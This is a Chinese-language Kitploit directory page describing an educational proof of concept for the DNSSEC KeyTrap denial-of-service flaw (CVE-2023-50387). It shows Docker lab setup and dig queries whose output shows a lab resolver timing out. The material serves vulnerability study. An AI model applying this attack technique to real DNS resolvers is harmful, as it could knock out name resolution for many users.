Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-50387 — 针对 DNSSEC KeyTrap 漏洞(CVE-2023-50387)的教育性概念验证,附带基于 Docker 的实验室环境,用于演示针对 DNS 解析器的算法复杂度攻击。 | Kitploit
工具/GitHubGitHub/knqyf263/cve-2023-50387
漏洞分析漏洞利用网络安全学习与教育DNS 分析实验室与实践
GitHubknqyf263/cve-2023-50387

CVE-2023-50387

针对 DNSSEC KeyTrap 漏洞(CVE-2023-50387)的教育性概念验证,附带基于 Docker 的实验室环境,用于演示针对 DNS 解析器的算法复杂度攻击。

查看仓库
451042年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-50387

DNS中的KeyTrap(CVE-2023-50387)

本仓库仅供教育目的使用。 密钥和签名的数量已被故意保持较低,以防止用于实际攻击,且不包含用于生成碰撞密钥的脚本。

测试

network

搭建PoC环境

root@kitploit:~
$ docker compose up --build

确认DNSSEC正常工作

root@kitploit:~
$ docker compose exec -it attacker dig @10.10.0.3 a.a.test

; <<>> DiG 9.18.24 <<>> @10.10.0.3 a.a.test
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 44249
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
;; QUESTION SECTION:
;a.a.test.                      IN      A

;; ANSWER SECTION:
a.a.test.               86400   IN      A       10.10.0.4

;; Query time: 30 msec
;; SERVER: 10.10.0.3#53(10.10.0.3) (UDP)
;; WHEN: Sun Feb 18 22:01:01 UTC 2024
;; MSG SIZE  rcvd: 53

触发KeyTrap

root@kitploit:~
$ docker compose exec -it attacker dig @10.10.0.3 www.a.test
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out

; <<>> DiG 9.18.24 <<>> @10.10.0.3 www.a.test
; (1 server found)
;; global options: +cmd
;; no servers could be reached
root@kitploit:~
$ docker compose exec -it attacker dig @10.10.0.3 b.a.test
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out

; <<>> DiG 9.18.24 <<>> @10.10.0.3 a.a.test
; (1 server found)
;; global options: +cmd
;; no servers could be reached

参考

  • https://www.athene-center.de/en/keytrap
下载工具